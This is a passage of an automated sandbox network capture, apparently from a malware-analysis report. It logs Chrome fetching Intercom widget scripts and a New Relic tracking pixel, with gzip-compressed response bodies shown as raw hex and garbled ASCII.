                                                                                                                                                                                                        2024-08-30 16:16:30 UTC8459INData Raw: 26 54 8e 75 60 6f 9e e3 8d c6 5a 6d 60 67 50 7a d1 86 d1 d8 82 7b 37 1a 69 ed 6c 11 1a ee b5 2d d3 ec 6d 5e f4 9b 3b 7d 8e 9b 09 c3 8d 46 a1 fa fd cd 23 99 fa fa e6 dd 52 5b 63 a6 9a 5b 28 eb f4 52 1f f7 96 da da 5e 6f 74 b6 8c 44 67 bd 9a 5b da d6 88 65 a3 be 79 03 4f b5 b5 6c 35 36 af ce 54 df 37 dd cd 87 d3 54 27 7f 5b 88 e5 2c d6 57 67 f3 48 66 25 ac da bc 85 67 3a 17 bd 65 75 66 25 c5 d8 66 1c 9c 69 f0 ee 6c 06 c9 ec 56 47 93 2d b5 75 46 63 cb e2 cc f4 c5 d9 82 de 33 8d 9b ea 6c 39 53 67 25 65 c8 96 b6 75 84 6d 6c 69 7b a1 a3 f7 66 98 3c e8 b2 c2 26 22 08 84 6d a6 69 2c b6 60 e0 64 a6 83 64 0b 96 94 ee 4c b6 2c ce 48 af bd 59 bc 9c e9 a7 fb 96 13 67 a6 1f ab 5b b4 10 b3 d2 d5 d0 96 33 7b a6 0b 0b f5 2d 8d eb b7 54 5b 24 a2 99 06 f0 2d b2 42 a4 0f 64
                                                                                                                                                                                                        Data Ascii: &Tu`oZm`gPz{7il-m^;}F#R[c[(R^otDg[eyOl56T7T'[,WgHf%g:euf%filVG-uFc3l9Sg%eumli{f<&"mi,`ddL,HYg[3{-T[$-Bd


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        142192.168.2.54993418.239.94.984436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC500OUTGET /vendor.e6414237.js HTTP/1.1
                                                                                                                                                                                                        Host: js.intercomcdn.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC793INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                        Content-Length: 196789
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:31 GMT
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 16:09:26 GMT
                                                                                                                                                                                                        ETag: "f353205285d0bef92a483210d7132936"
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        Cache-Control: max-age=31536000, s-maxage=7200, public
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        x-amz-version-id: gTdrlXiH6c0afuC_OK1F6tuQsalX2WF6
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        Via: 1.1 ff78b299270b99e41cda1a1252610524.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        X-Amz-Cf-Id: PV5d3z0RMVNfPN8_oEzwUXat2vKEpGrBF3_4ZEDJ5fWs7koA7MCqmQ==
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC16384INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 7b 7f db 38 ae 30 fc ff fb 29 1c 6d 27 23 d5 8a 63 3b 71 2e 72 55 9f b4 4d a7 3d db db 69 d2 b9 ac eb c9 ca 12 6d 6b 22 4b 1e 49 76 92 89 fd 7c f6 17 00 49 89 ba 38 4d 67 cf fb 7b de 9d 6d 2c 51 bc 80 20 08 80 20 08 ee 3f dd 69 bc 8e e2 46 e0 bb 2c 4c 58 c3 0f 27 51 3c 77 52 3f 0a 1b 8b 80 39 90 94 30 d6 58 b1 d0 8b e2 16 3b 3a ec 1c 76 0f 8e 5b 7f 24 ad 77 6f 5f 9e 7f b8 38 6f a5 b7 69 e3 e9 fe ff a3 27 2c 98 b4 6e d8 78 e1 b8 d7 2f 67 cb f0 da 0f 53 16 bb d1 fc ea 8f c4 7e e8 e3 7a 3d 1c 19 ad c5 32 99 e9 c3 e1 61 a7 db 19 99 f7 dd de 49 a7 67 4d 96 a1 8b 90 e8 cc 4c cd d0 b8 d7 96 08 4e 1a fb 6e aa f5 c3 96 a7 a7 e6 fd 59 9e cb b8 8f 59 ba 8c c3 c6 7c b3 31 fa 2b 27 6e c4 76 a8 1f 9d b4 4f 3a 86 19 c1 e3 61 fb e0 b4
                                                                                                                                                                                                        Data Ascii: {80)m'#c;q.rUM=imk"KIv|I8Mg{m,Q ?iF,LX'Q<wR?90X;:v[$wo_8oi',nx/gS~z=2aIgMLNnYY|1+'nvO:a
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC467INData Raw: 46 8f db 82 3e c7 e6 7d 31 d8 33 68 2b 16 76 0e 4d 7a 18 88 4a 41 7f dd 91 b4 69 10 8d 9d e0 12 26 81 c4 54 9e 42 d7 a9 29 02 1a 58 02 f0 a4 ad b2 3b bf 57 ad ae 21 be 21 2d 1b e1 6f 9b 0d 4e cc 56 24 31 51 11 fd 45 af bf 2c fc 37 16 8a 69 1c 1e 8a 24 9d c5 15 cf 6e d2 d9 8e c6 6a 5e 19 4c 5b e3 63 ab c1 b0 6d 2b ac e5 24 90 5d 3f 83 a1 b5 37 f2 e6 96 cc 01 86 94 be d2 fd 01 c8 db 91 1c 80 4b df ab a4 73 23 6e 0f 00 fd f0 c3 f9 af 5f 2e ae 5e be 7b 7b fe e1 f2 ea e7 f3 cf 17 6f 3f 7e b0 b4 76 ab 73 d8 6a 6b e6 db 8b ab cb df 3e bd fd f0 d3 d5 e5 9b cf 1f 2f 2f df 9d 5b b8 47 f1 e9 f3 f9 c5 f9 87 97 e7 57 6f 3f 5c 9e 7f fe f9 ec 9d d5 e9 b2 c3 3c f9 fc c3 d9 8b 77 e7 af 90 66 78 e1 b7 ef cf 3f 7e b9 b4 3a 3d 2c fc 51 4d 81 62 bf 9c bf b8 f8 f8 f2 9f e7 97
                                                                                                                                                                                                        Data Ascii: F>}13h+vMzJAi&TB)X;W!!-oNV$1QE,7i$nj^L[cm+$]?7Ks#n_.^{{o?~vsjk>//[GWo?\<wfx?~:=,QMb
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC16384INData Raw: e2 e8 b8 34 3a 7b 7f 24 2d 0d 74 9d 7b 3f 74 e3 d2 39 62 00 05 86 d5 9f 17 63 4a a0 1d 63 23 a9 73 f9 ed 11 bd 4a fc f0 da 4e ea 86 12 46 e6 02 3f 56 c6 85 97 29 0d 4b 85 84 0b d5 97 46 50 74 66 4b d5 79 06 dd a9 0c 08 ef 71 c9 72 a3 94 e5 df b1 20 1d 1b 26 cc aa 77 c7 17 6f d7 cd e3 7c 52 15 7e e8 a7 be 13 bc 70 12 f6 8a 05 ce 9d 8c 0c 0e d2 3a 4f 93 77 bd c2 d2 38 9a 4c de 03 4b f3 17 30 5a 40 dc 22 b3 1f 7e e6 47 8b e3 ac b4 48 88 78 02 e1 4a 37 ea 90 5e 8f 46 bc c5 e5 6d 19 b6 5a 88 8b c8 c2 72 25 21 b9 b5 be e7 95 9e 1a 8a 0c 94 30 9b b4 34 e5 e1 6a 2b 05 78 84 2f 7e ae 9a 3b 24 17 11 52 42 87 21 65 40 b9 ce 3a f0 be bf 6e 15 fa ed 08 dc de 56 65 80 cd 32 c9 e7 c0 d4 9e 4a 6f f0 5d 78 ca a5 1b 3c ac 73 93 71 9a cc 35 3c 2e f4 ef 1f 73 28 00 af c1 c1
                                                                                                                                                                                                        Data Ascii: 4:{$-t{?t9bcJc#sJNF?V)KFPtfKyqr &wo|R~p:Ow8LK0Z@"~GHxJ7^FmZr%!04j+x/~;$RB!e@:nVe2Jo]x<sq5<.s(
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC16384INData Raw: 94 1b 5c 3b b7 93 aa ba ad 83 62 20 1f bd 82 3e 2d 32 52 a3 bc 2e ce 1d 3c 20 e5 70 e9 f8 df 15 c7 a3 5c dd 71 00 f5 7a ae c7 12 5a 85 6b ea f5 2f d6 37 ed 27 f8 79 5a b5 7b ca 10 55 ec 5b 77 06 6d 48 e4 7f 2e 75 d4 3d 17 17 65 98 61 6c 9f 79 d7 4a 6b af 6e ec 2b 3c fc 0b 6a e2 14 85 49 04 9c 39 c9 d3 e5 73 33 64 85 71 3d 95 92 06 86 56 9c dc 17 ad 2c 56 53 c4 65 38 f5 3f 86 0e ea bd af 05 29 bf 69 38 a7 ac 9e 80 c3 75 ff 52 1f 26 05 8b 77 1d 7a b0 ac ee 9f 61 77 ad 28 94 b5 86 a6 78 a7 5c 9c aa 54 41 9a 3f e8 ce 80 f9 52 84 ef 9e 3a 7f 47 13 7f 1f 35 f1 b8 66 d7 62 08 eb b6 2f 7a 80 ff 7a e1 b4 e6 3f b4 4b fb c4 70 03 1d c4 43 55 b6 a7 17 9a a2 44 32 1f ea 2c 8a 86 06 06 fe 7e bd 5e 2a 9a a3 1e b8 3a 3f 8d 3c 29 98 ad 4a b9 85 2c 5e 4e db 3a 55 48 25 7c
                                                                                                                                                                                                        Data Ascii: \;b >-2R.< p\qzZk/7'yZ{U[wmH.u=ealyJkn+<jI9s3dq=V,VSe8?)i8uR&wzaw(x\TA?R:G5fb/zz?KpCUD2,~^*:?<)J,^N:UH%|
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC2048INData Raw: db 87 bf 7c dc d3 76 c2 c0 97 54 1d 06 89 27 9c a4 70 18 04 d5 a6 f8 6e c1 43 82 54 54 85 92 02 54 f1 3e 9f bb 26 01 74 c2 52 04 02 03 56 c2 c6 14 60 98 ad 95 dc 81 0a 47 8a b8 76 d2 c6 38 8b e9 78 9c 22 21 d1 6f af d8 9e 0d 85 0a 39 fb bf 1f 9e 9c 9e 78 99 e0 22 16 de 48 d8 25 2c bc 2e 4e bf b9 3e 2f 0a 9b 3a 67 4f 78 82 58 6e 8f 29 08 f5 cf ac 06 e1 af 4e 7c 56 08 77 47 0f 3c 44 9a f3 d2 6d 8a e3 36 d9 f3 9e a8 70 a8 f6 0c 97 d9 2e 3c 87 b8 95 d5 2d f3 fa 7b 3c 47 99 10 40 19 1e 18 32 25 8d 11 51 d1 8b 2f a8 8a 3a 98 86 e0 48 1f b2 22 3a df 04 60 fc 7e 57 07 76 a0 7a 8e de 94 43 23 5f ac b5 31 6c 16 59 43 cc 8f d1 56 21 34 ae 97 52 d5 1b fc 17 90 04 3b 52 73 de 8e 79 13 95 c8 62 71 4a 61 22 03 c6 65 68 03 c9 f5 6b 6b 98 cd c3 08 09 76 ea 86 d9 fb bd 18
                                                                                                                                                                                                        Data Ascii: |vT'pnCTTT>&tRV`Gv8x"!o9x"H%,.N>/:gOxXn)N|VwG<Dm6p.<-{<G@2%Q/:H":`~WvzC#_1lYCV!4R;RsybqJa"ehkkv
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC12792INData Raw: 84 60 54 30 4f 8f 41 83 34 84 7f 85 bb ee 16 e9 0c 1a a6 21 f2 69 3a 99 c6 a9 94 c2 99 52 6f f5 0c 81 91 c8 e6 e0 c4 e6 c3 60 c7 99 22 be f8 4a 00 c4 7b 3f bb 23 05 c3 8c b5 14 85 7d 05 5b d8 ac 1f 9c 39 81 4c 80 41 c1 90 ab 98 98 46 ac 25 da 04 39 c7 7f 11 1e 03 58 24 33 74 f7 da f4 af 3e 43 73 c4 a6 7f e1 77 44 fb b1 14 34 dc 4e d7 9a 71 a4 18 5e c9 b4 54 27 69 18 a4 36 76 86 ce c8 b5 5d 76 13 ba 46 8f a1 63 f2 64 ea 8c 03 c2 60 82 c7 63 06 95 5b 3a 85 3d eb 91 e8 3e 38 da c9 88 72 9a 10 95 a1 3f 3f bf c1 6e cb 7b 4d c4 8b b8 79 e1 25 87 78 ce 73 af c8 6e 32 70 e1 31 d6 93 2f c9 4e 7a 94 e0 5f b1 7c d6 0a 09 65 2d 20 90 1e 4f 77 7d 9a c9 79 23 93 56 71 54 c9 29 63 ec e1 91 d1 23 32 d0 ac 67 fd ce 42 87 a3 19 b2 20 f8 0b d0 b1 10 98 41 ab e1 54 96 8a 90
                                                                                                                                                                                                        Data Ascii: `T0OA4!i:Ro`"J{?#}[9LAF%9X$3t>CswD4Nq^T'i6v]vFcd`c[:=>8r??n{My%xsn2p1/Nz_|e- Ow}y#VqT)c#2gB AT
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC16384INData Raw: b3 1d e5 1a 2b 49 be b9 6c d4 24 43 83 f8 6e a6 e4 ff 43 2c 02 a3 db 2b 5a e2 9b 36 34 17 1e 4c a4 f4 44 43 73 39 12 a5 72 64 91 46 8c 86 a9 f8 99 a6 a1 ac 71 2a 47 46 a9 1c 99 93 d0 ef 61 e2 c4 24 95 39 4b fb 89 d0 ae be b2 59 6c 67 66 f3 1a a5 4c c1 91 8c 0f 8d 66 29 cd a7 be 33 f0 c1 2a 5e 81 b5 14 0e b8 9d 6c a1 3b d0 b7 c3 01 6e c1 94 b8 c6 11 ef 83 45 2d a4 80 60 ec 60 e0 9e 78 2c 9d c3 13 56 cf 08 fb 6e 40 d3 67 d3 d8 cc 99 a9 60 f1 22 cf 47 c6 dc ed b3 72 ff f3 cb b4 f0 c2 05 23 fe 21 9e 38 b1 15 3d b2 d7 50 d8 c0 53 f4 08 53 bc e1 fd 1d f5 06 64 28 0c 07 f8 23 4d 5d ba 59 d6 eb b6 50 57 92 2b fb 41 1e 71 53 d5 44 4f 1b ff 0c da 24 72 3f bc 1b 6d 6c 4c 14 f4 f6 15 18 be db a3 f6 06 47 1b ac ef 2f 15 f4 23 90 1a 0c 49 f4 03 35 8b 96 53 e6 c7 5b 79
                                                                                                                                                                                                        Data Ascii: +Il$CnC,+Z64LDCs9rdFq*GFa$9KYlgfLf)3*^l;nE-``x,Vn@g`"Gr#!8=PSSd(#M]YPW+AqSDO$r?mlLG/#I5S[y
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC2804INData Raw: 07 63 43 f6 35 8e 23 27 09 df 3f 71 c7 ee 7f a0 22 b5 bf 27 70 4e bd 56 7b 68 65 e8 4c 2a 5b 9d b7 de 24 d6 ea 83 b7 22 a0 21 74 c0 e3 e7 c5 5f ec 9c 8f fe e9 99 5e 1d ba 97 f5 b9 ef 54 9a f4 cc 76 33 77 d4 fe 7a 47 51 a2 56 35 3e e1 a3 aa b5 3a f5 da e3 ed 9f 5a 08 fe 68 51 de 0f e4 73 bb d0 0a e0 73 f8 05 31 3a bc d8 c8 e9 84 b1 5b bb 7d df 32 06 9d d3 aa 56 2a e8 5f 33 bf 09 46 ca d2 87 be ee 7c 87 6b 8f 0e e5 c1 7c d2 4d f8 64 3a e4 84 f0 63 44 c1 46 84 67 9d 26 1c 13 05 1b 01 7e 81 82 8d 80 d7 98 25 1b 19 67 ea 64 13 77 21 04 8e dc 4d c2 7d 79 17 02 41 67 68 17 42 60 25 12 90 06 c5 47 a4 5d 08 86 f0 20 9b 29 8e 69 4b 36 53 22 2c ec a1 12 ca c8 66 4a 40 dc ec 53 cd eb d5 0e 87 9b d8 ad 23 06 2c 86 9b 60 fb ac f7 8e f2 b8 fc 88 b9 56 2a 78 f2 f6 01 a9
                                                                                                                                                                                                        Data Ascii: cC5#'?q"'pNV{heL*[$"!t_^Tv3wzGQV5>:ZhQss1:[}2V*_3F|k|Md:cDFg&~%gdw!M}yAghB`%G] )iK6S",fJ@S#,`V*x
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC12792INData Raw: 5e 03 5c 08 1c 6e 00 4f 35 0a 34 f6 dc eb 59 01 1a a1 24 9d 00 ba a5 3a 76 c7 43 e2 90 a4 bb 07 6f e7 ea 8d ac e1 9e 5b 39 42 03 bf 47 2e b6 91 37 5e 8c 3c 32 0d 7c 2c 9d 6a fb 35 1b f4 74 41 a8 20 e7 3f 5e 63 11 6d 9a 7a 93 ef 6b d2 bf af 35 8d dd c7 4e bb 34 97 f3 37 73 39 97 1d 09 26 d3 10 08 d3 c7 a6 5c 7a d1 dc db 40 7c b6 8a 2c 8e 5b 82 3a 44 75 b0 43 07 43 95 9e ff 2c ea 59 9e 13 0f 7c 8c 6b eb 03 c5 c1 f5 f6 76 80 77 c1 d0 51 7b 2e 31 0b 49 f5 da 43 85 3d 6d 41 d7 ec b7 45 8b dd 64 1b 94 5d 25 db 12 7b 43 20 a6 64 f6 a1 34 14 52 dc 86 52 3b 34 b0 86 4f 8a c5 89 b6 12 cf 9c 71 b1 38 26 f3 ba 33 c7 4f 75 eb 25 dc 6f e8 56 58 bf f3 b6 85 70 37 88 44 89 97 53 f7 42 7e 62 d6 b4 98 e3 33 0c a8 c1 fd da ad da 95 6e 1d 66 a8 65 d7 71 37 88 bd 0f 61 dd bf
                                                                                                                                                                                                        Data Ascii: ^\nO54Y$:vCo[9BG.7^<2|,j5tA ?^cmzk5N47s9&\z@|,[:DuCC,Y|kvwQ{.1IC=mAEd]%{C d4RR;4Oq8&3Ou%oVXp7DSB~b3nfeq7a
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC6396INData Raw: 43 f9 4e e6 6b 7c e7 57 7a 67 75 4c cf d9 ae 3d 7c 80 cb a4 2b 10 ee 7c 76 9d ec be 40 9f 28 bb 5e 69 77 ee f1 23 c2 30 b0 9d 46 9b 42 e4 36 5b f7 c0 46 e5 38 70 30 44 d4 9a 2b 06 cd bf f5 b9 6e df f2 e8 e6 45 60 32 e1 43 2d 46 8a 1c 3e e1 ac 4b 71 80 3a 5e 3d 47 94 ae 7a 75 58 47 5a 95 a7 18 5b 04 fe 04 50 b1 5a e3 69 04 aa 70 fb 69 08 7a 70 bd d5 2c d7 9a 4f c3 9e fc 76 6b 2e 43 0d c8 48 95 f1 73 a7 5a 6e 3e 55 9b 6f 64 f8 1f 85 0b 0c 90 b5 13 60 b0 0b d0 74 4b 66 d8 37 e6 06 6a 4e 9a bb a0 d6 63 0b eb 76 81 47 2e b7 bc f8 8d 94 bd 37 69 7f 0a 9b 05 37 08 95 35 6d 45 ee cc 64 7c 56 61 09 17 81 1b 61 89 56 bb 60 15 f9 ba 00 37 db f9 c3 dc ee 9b fd ee 97 71 c9 ea 7f 29 f7 f1 ef d6 53 f3 c2 9f 4e fd b9 07 c4 32 9e f7 97 17 70 45 7f 96 2a 89 53 e6 cb 0b 3f
                                                                                                                                                                                                        Data Ascii: CNk|WzguL=|+|v@(^iw#0FB6[F8p0D+nE`2C-F>Kq:^=GzuXGZ[PZipizp,Ovk.CHsZn>Uod`tKf7jNcvG.7i75mEd|VaaV`7q)SN2pE*S?


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        143192.168.2.54993818.239.83.604436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC357OUTGET /widget/cirlxq0d HTTP/1.1
                                                                                                                                                                                                        Host: widget.intercom.io
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:31 UTC728INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                        Content-Length: 2666
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:31 GMT
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 16:11:39 GMT
                                                                                                                                                                                                        ETag: "79e0f7a4501bc79dbd676680491c8929"
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        Cache-Control: max-age=300, s-maxage=300, public
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        x-amz-version-id: vOA4_cNch4D_lr80yYCWWsT3S7yJgchq
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        X-Cache: Error from cloudfront
                                                                                                                                                                                                        Via: 1.1 77c9addf0db376b3faacc5e07c320552.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        X-Amz-Cf-Id: ay3vQD93JZPlTfJMktmGH8KXgeoZYTi72ZGwXNGwKNXScQooXqS8vw==
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                        2024-08-30 16:16:31 UTC2666INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 59 0b 73 d3 3a 16 fe 2b 8e 77 27 b5 a7 8e 93 94 42 21 c5 b0 a5 94 a5 b3 94 76 08 73 f7 ee 94 6e 46 b1 95 44 e0 48 be b2 d2 34 37 c9 7f df 4f f2 23 76 92 16 ee cc 32 d0 da 47 e7 a5 a3 f3 f8 64 1a a3 19 0f 15 13 dc 71 97 f7 44 5a 34 58 9e bc e8 1e 77 7b 25 9d ba 4b ea d3 87 44 48 95 06 cb 54 cc 64 48 07 53 92 f4 ec 09 8b 22 ca 5b 19 a9 05 92 ed 91 84 0d 86 24 a5 58 54 2a 49 7b ed 36 28 2d 46 a6 3e e3 8a ca 50 e0 41 d8 5e 32 1b c6 2c 1c 24 44 4d 36 9c df d3 92 29 8c b8 8f 5f 6d db 4b 27 94 aa 74 90 48 f1 b0 d8 e2 2f 98 5b 19 8f 11 a8 b2 43 98 72 25 17 7b 85 e7 f3 79 69 ad 25 a9 de 1d e3 e3 4c 87 91 82 fa 88 3e f8 13 35 8d 6d 8f f1 54 91 38 1e 4c 45 44 77 f6 97 6c f6 86 7f a5 d5 28 e5 1b ae d1 b3 ce f3 88 be 78 15 92 f0 c5 31
                                                                                                                                                                                                        Data Ascii: Ys:+w'B!vsnFDH47O#v2GdqDZ4Xw{%KDHTdHS"[$XT*I{6(-F>PA^2,$DM6)_mK'tH/[Cr%{yi%L>5mT8LEDwl(x1


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        144192.168.2.549939162.247.243.304436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC538OUTGET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=55786&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1
                                                                                                                                                                                                        Host: bam-cell.nr-data.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: JSESSIONID=4a13c21de71e3a5f
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC291INHTTP/1.1 200
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:30 GMT
                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        x-served-by: cache-ewr-kewr1740054-EWR
                                                                                                                                                                                                        2024-08-30 16:16:30 UTC24INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                        Data Ascii: GIF89a,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        145192.168.2.54994318.239.94.984436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:31 UTC360OUTGET /vendor.e6414237.js HTTP/1.1
                                                                                                                                                                                                        Host: js.intercomcdn.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC793INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                        Content-Length: 196789
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:33 GMT
                                                                                                                                                                                                        Last-Modified: Fri, 30 Aug 2024 16:09:26 GMT
                                                                                                                                                                                                        ETag: "f353205285d0bef92a483210d7132936"
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                        Cache-Control: max-age=31536000, s-maxage=7200, public
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        x-amz-version-id: gTdrlXiH6c0afuC_OK1F6tuQsalX2WF6
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        Via: 1.1 72aa637991c46f23f831d2a4b7cb6c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        X-Amz-Cf-Id: SFXaNN_jgc8aX1q-yHhVX4GBd700gmjIzd49fyIMAvEraBEoCOn4xw==
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC7526INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 7b 7f db 38 ae 30 fc ff fb 29 1c 6d 27 23 d5 8a 63 3b 71 2e 72 55 9f b4 4d a7 3d db db 69 d2 b9 ac eb c9 ca 12 6d 6b 22 4b 1e 49 76 92 89 fd 7c f6 17 00 49 89 ba 38 4d 67 cf fb 7b de 9d 6d 2c 51 bc 80 20 08 80 20 08 ee 3f dd 69 bc 8e e2 46 e0 bb 2c 4c 58 c3 0f 27 51 3c 77 52 3f 0a 1b 8b 80 39 90 94 30 d6 58 b1 d0 8b e2 16 3b 3a ec 1c 76 0f 8e 5b 7f 24 ad 77 6f 5f 9e 7f b8 38 6f a5 b7 69 e3 e9 fe ff a3 27 2c 98 b4 6e d8 78 e1 b8 d7 2f 67 cb f0 da 0f 53 16 bb d1 fc ea 8f c4 7e e8 e3 7a 3d 1c 19 ad c5 32 99 e9 c3 e1 61 a7 db 19 99 f7 dd de 49 a7 67 4d 96 a1 8b 90 e8 cc 4c cd d0 b8 d7 96 08 4e 1a fb 6e aa f5 c3 96 a7 a7 e6 fd 59 9e cb b8 8f 59 ba 8c c3 c6 7c b3 31 fa 2b 27 6e c4 76 a8 1f 9d b4 4f 3a 86 19 c1 e3 61 fb e0 b4
                                                                                                                                                                                                        Data Ascii: {80)m'#c;q.rUM=imk"KIv|I8Mg{m,Q ?iF,LX'Q<wR?90X;:v[$wo_8oi',nx/gS~z=2aIgMLNnYY|1+'nvO:a
